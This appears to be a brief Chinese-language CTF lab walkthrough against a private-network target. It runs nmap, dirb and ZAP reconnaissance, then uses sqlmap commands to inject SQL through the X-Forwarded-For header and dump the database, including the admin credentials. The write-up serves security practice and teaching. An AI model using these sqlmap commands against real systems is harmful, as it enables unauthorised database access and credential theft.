CTF-攻防练习
CTF-攻防练习
攻击机ip:192.168.1.6
靶场ip:192.168.1.5
一.使用nmap进行扫描
nmap -T4 -A -v 靶场ip
二.使用dirb扫描该ip
发现一个admin页面,打开该连接发现需要登陆,既然存在输入输出,也许会存在sql注入。
为了验证我们这个想法,我们可以用漏洞扫描器试探。在这里,我选择zap进行扫描
我们发现存在这么一个漏洞。X-Forwarded-For报文头并没有在http报文中出现那么我们就可以利用sqlmap进行注入得到:
使用命令:sqlmap -u "http://192.168.1.5" --headers="X-Forwarded-For:*" --dbs --batch
然后在使用命令爆破表,字段,行即可
sqlmap -u "http://192.168.1.5" --headers="X-Forwarded-For:*" -D 数据库名 --table --batch
sqlmap -u "http://192.168.1.5" --headers="X-Forwarded-For:*" -D 数据库名 -T 表名 --columns --batch
sqlmap -u "http://192.168.1.5" --headers="X-Forwarded-For:*" -D 数据库名 -T 表名 -C 字段名 --dump --batch
好了,我们已经爆破出了admin账号和密码了,登陆看看吧
好了,我们就可以为所欲为啦!😍😍😍😍😍